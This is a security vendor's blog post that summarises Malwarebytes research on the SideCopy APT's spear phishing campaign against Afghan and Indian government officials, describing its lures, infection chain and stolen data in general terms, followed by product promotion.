Skip to content
Search
  • There are no suggestions because the search field is empty.
Cancel
Get Started Now

    Security Awareness Training Blog

    SideCopy: How an Intelligence Service Uses Phishbait

    Stu Sjouwerman | Dec 7, 2021

    Intelligence Service Uses PhishbaitResearchers at Malwarebytes offer more details on a spear phishing campaign run by a Pakistani threat actor that’s come to be known as “SideCopy.” The campaign was first reported by Facebook earlier this year.

    “The SideCopy APT has been actively targeting government and military officials in South Asia,” Malwarebytes says. “The group mainly uses archived files to target victims in spam or spear phishing campaigns. The archive files usually have an embedded lnk, Office or Trojanized application that are used to call mshta to download and execute an hta file. The hta files perform fileless payload execution to deploy one of the RATs associated with this actor such as AllaKore or Action Rat.”

    The threat actor is using targeted phishing emails as well as more generic lures to target individuals in Afghanistan and India.

    The targeted phishbait is designed to attract specific officials. “These lures are specially crafted and designed to target specific victims,” Malwarebytes says. “We believe this category is very well customized to target government or military officials.”

    The generic lures include “romantic lures” with pictures of women to prompt users into opening the malicious attachments. The researchers believe that these emails were “used in spam campaigns to collect emails and credentials to help the actor perform their targeted attacks.”

    Malwarebytes adds that the campaign has been successful at stealing information from government targets.

    “The SideCopy APT was able to steal several Office documents and databases associated with the Government of Afghanistan,” the researchers write. “As an example, the threat actor exfiltrated Diplomatic Visa and Diplomatic ID cards from the Ministry of Foreign Affairs of Afghanistan database, as well as the Asset Registration and Verification Authority database belonging to the General Director of Administrative Affairs of Government of Afghanistan. They also were able to exfiltrate the ID cards of several Afghani government officials.”

    New-school security awareness training can enable your employees to thwart targeted social engineering attacks.

    Malwarebytes has the story.

    Topics: Spear Phishing

    Discover Your Organization’s Phish-prone™ Percentage

    Ninety-one percent of data breaches begin with spear phishing. Launch our Free Phishing Security Test for up to 100 users to uncover your team's vulnerability and see how your security posture stacks up against industry benchmarks.

    Get Your Free Phishing Security Test

    Secure the Digital Workforce: Human + AI

    KnowBe4 empowers the modern workforce to make smarter security decisions every day. Trusted by more than 70,000 organizations worldwide, KnowBe4 is the pioneer of digital workforce security, securing both AI agents and humans. The KnowBe4 Platform provides attack simulation and training, collaboration security, and agent security powered by AIDA (Artificial Intelligence Defense Agents) and a proprietary Risk Score. The platform leverages 15 years of behavioral data to combat advanced threats including social engineering, prompt injection, and shadow AI. By securing humans and agents, KnowBe4 leads the industry in workforce trust and defense.

    Stu Sjouwerman

    ABOUT STU SJOUWERMAN

    Stu Sjouwerman (pronounced “shower-man”) is the Founder and Executive Chairman of KnowBe4, Inc., which hosts the world’s most popular integrated security awareness training and simulated phishing platform, with over 54,000 organization customers and more than 50 million users. A serial entrepreneur and data security expert with 30 years in the IT industry, Stu was the co-founder of Inc. 500 company Sunbelt Software, a multiple award-winning anti-malware software company that was acquired in 2010.

    Read more from Stu »

    Subscribe to Our Blog

    Posts By Topic

    View All